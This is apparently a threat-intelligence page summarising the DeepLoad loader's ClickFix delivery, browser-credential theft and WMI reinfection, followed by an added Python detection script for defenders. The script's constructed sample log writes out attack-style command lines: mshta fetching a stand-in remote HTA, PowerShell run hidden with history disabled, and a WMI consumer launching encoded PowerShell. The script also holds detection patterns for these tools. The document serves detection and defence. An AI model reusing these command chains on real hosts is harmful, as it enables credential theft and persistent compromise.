DeepLoad ClickFix loader with browser-credential theft and WMI reinfection
Malware Activity
Summary
The DeepLoad malware loader now uses ClickFix delivery to compromise Windows hosts, raising the risk of credential theft and reinfection. It abuses mshta.exe, obfuscated PowerShell, and APC injection to evade detection while hiding in a process named LockAppHost.exe. The loader also steals browser passwords, captures sessions, and can persist across user logins unless the malicious extension is removed. Its WMI reinfection behavior lets it return to a supposedly clean host days later, extending exposure and complicating remediation.
Related Happenings
DeepLoad credential-stealing malware activity with WMI persistence
Malware Activity
First: 31.03.2026 00:25
Last: 31.03.2026 00:25
Sources 1
About this happening:
The **DeepLoad** malware strain is stealing credentials immediately after infection, exposing **stored browser passwords**, **live keystrokes**, and **active accounts** in **enter...
DeepLoad malware uses ClickFix, AI obfuscation, and WMI persistence
Malware Activity
First: 30.03.2026 15:00
Last: 30.03.2026 15:00
Sources 1
About this happening:
The **DeepLoad** malware family is actively using **ClickFix** lures and **AI-generated obfuscation** to steal **enterprise credentials** from **Windows** systems, increasing the...
ClickFix fake CAPTCHA campaign delivering Amatera
Campaign
First: 26.01.2026 23:42
Last: 26.01.2026 23:42
Sources 1
About this happening:
A **ClickFix** campaign now uses a **fake CAPTCHA** and a signed **Microsoft App-V** script to deliver **Amatera** to **Windows** victims, raising the risk of credential theft and...
Timeline
30.03.2026 18:47 2 articles · 1mo ago
DeepLoad ClickFix campaign disclosed
Initial Disclosure: ReliaQuest disclosed a new ClickFix campaign that distributes the previously undocumented DeepLoad loader through a lure that prompts users to paste PowerShell commands into the Windows Run dialog, leading to an mshta.exe download-and-execute chain and obfuscated PowerShell that conceals its functionality. DeepLoad blends into Windows activity by hiding payload behavior inside LockAppHost.exe, disabling PowerShell command history, using APC injection to run its main payload in a trusted process, and stealing browser passwords and sessions through a malicious browser extension that persists across logins. The loader also uses WMI event subscription to reinfect a clean host three days later, extending persistence and complicating removal.
- DeepLoad Malware Uses ClickFix and WMI Persistence to Steal Browser Credentials — thehackernews.com — 30.03.2026 18:47
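The detection points in this timeline entry (mshta.exe launched from the Run dialog with a URL on its command line, PowerShell started hidden or with history saving disabled, and a WMI CommandLineEventConsumer bound to an event filter for reinfection) expressed as detection logic run over constructed Sysmon-style records. This is an added example, not code from ReliaQuest, The Hacker News, or any DeepLoad analysis; the field names follow Sysmon's schema for event IDs 1, 19, 20 and 21, the `CommandLineEventConsumer.Name="..."` format of the EID 21 Consumer field and the exact PowerShell switches checked are assumptions, and every log line is constructed.

```python
"""Flag the ClickFix launch chain and WMI event-subscription persistence.

Added example (not vendor code). Input is Sysmon-style events as JSON lines:
  EID 1  process creation (Image, ParentImage, CommandLine)
  EID 19 WMI filter   (Name, Query)
  EID 20 WMI consumer (Name, Type, Destination)
  EID 21 WMI binding  (Consumer, Filter)
Field names follow Sysmon's documented schema; all sample records are constructed.
"""
import json
import re
from typing import Dict, Iterable, List, Optional

# Scripting hosts that a CommandLineEventConsumer has no business launching.
LOLBIN_RE = re.compile(r"\b(mshta|powershell|pwsh|wscript|cscript)(\.exe)?\b", re.I)
URL_RE = re.compile(r"https?://", re.I)
# Assumption: the page only says history is disabled; these are the common switches.
HIDDEN_RE = re.compile(r"-w(indowstyle)?\s+hidden", re.I)
HISTORY_OFF_RE = re.compile(r"HistorySaveStyle\s+SaveNothing", re.I)


def check_process(ev: Dict) -> Optional[Dict]:
    """Sysmon EID 1: mshta download-and-execute and hidden/history-off PowerShell."""
    image = ev.get("Image", "").lower()
    parent = ev.get("ParentImage", "").lower()
    cmd = ev.get("CommandLine", "")
    if image.endswith("\\mshta.exe") and URL_RE.search(cmd):
        detail = "mshta.exe executing remote content"
        if parent.endswith("\\explorer.exe"):
            # A paste into the Run dialog is spawned by explorer.exe.
            detail += "; parent explorer.exe is consistent with a Run-dialog paste"
        return {"rule": "clickfix_mshta", "severity": "high", "detail": detail}
    if image.endswith(("\\powershell.exe", "\\pwsh.exe")) and (
        HIDDEN_RE.search(cmd) or HISTORY_OFF_RE.search(cmd)
    ):
        return {"rule": "ps_hidden_or_history_off", "severity": "medium",
                "detail": "PowerShell started hidden or with history saving disabled"}
    return None


def check_wmi(events: Iterable[Dict]) -> List[Dict]:
    """Sysmon EIDs 19/20/21: a consumer that runs a scripting host is suspicious;
    a binding that wires it to a filter means the persistence is armed."""
    events = list(events)          # two passes, since bindings may be logged first
    findings: List[Dict] = []
    bad_consumers: Dict[str, str] = {}
    filters: Dict[str, str] = {}
    for ev in events:
        if ev.get("EventID") == 19:
            filters[ev.get("Name", "")] = ev.get("Query", "")
        elif ev.get("EventID") == 20 and ev.get("Type") == "Command Line":
            dest = ev.get("Destination", "")
            if LOLBIN_RE.search(dest):
                bad_consumers[ev.get("Name", "")] = dest
                findings.append({"rule": "wmi_cmdline_consumer", "severity": "medium",
                                 "detail": f"consumer {ev.get('Name')} runs: {dest}"})
    for ev in events:
        if ev.get("EventID") != 21:
            continue
        consumer_ref = ev.get("Consumer", "")   # assumed form: CommandLineEventConsumer.Name="X"
        filter_ref = ev.get("Filter", "")
        for name, dest in bad_consumers.items():
            if name and name in consumer_ref:
                findings.append({"rule": "wmi_persistence_armed", "severity": "high",
                                 "detail": f"binding {filter_ref} -> {name}: {dest}"})
    return findings


def scan(lines: Iterable[str]) -> List[Dict]:
    """Parse JSON lines, run the process rules per event and the WMI rules across all."""
    events = [json.loads(line) for line in lines if line.strip()]
    findings = [f for f in (check_process(e) for e in events if e.get("EventID") == 1) if f]
    findings.extend(check_wmi(events))
    return findings


# Constructed sample log; URL, names and the -enc payload are placeholders.
SAMPLE_LOG = r"""
{"EventID": 1, "Image": "C:\\Windows\\System32\\mshta.exe", "ParentImage": "C:\\Windows\\explorer.exe", "CommandLine": "mshta.exe https://lure.example/verify.hta"}
{"EventID": 1, "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "ParentImage": "C:\\Windows\\System32\\mshta.exe", "CommandLine": "powershell.exe -w hidden -c \"Set-PSReadLineOption -HistorySaveStyle SaveNothing\""}
{"EventID": 1, "Image": "C:\\Windows\\System32\\notepad.exe", "ParentImage": "C:\\Windows\\explorer.exe", "CommandLine": "notepad.exe"}
{"EventID": 19, "Name": "ex_filter", "Query": "<constructed WQL filter query>"}
{"EventID": 20, "Name": "ex_consumer", "Type": "Command Line", "Destination": "powershell.exe -w hidden -enc <placeholder>"}
{"EventID": 21, "Consumer": "CommandLineEventConsumer.Name=\"ex_consumer\"", "Filter": "__EventFilter.Name=\"ex_filter\""}
""".strip().splitlines()

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f["severity"].upper(), f["rule"], "-", f["detail"])
```

Running the file prints four findings for the constructed log: the mshta launch, the hidden PowerShell, the consumer, and the armed binding. The binding rule is the one worth paging on; a command-line consumer on its own can be legitimate management tooling, but one that runs a scripting host and is bound to a filter matches the delayed-reinfection behaviour described above, and removing the extension or payload without deleting the filter, consumer and binding in `root\subscription` leaves the host to come back three days later.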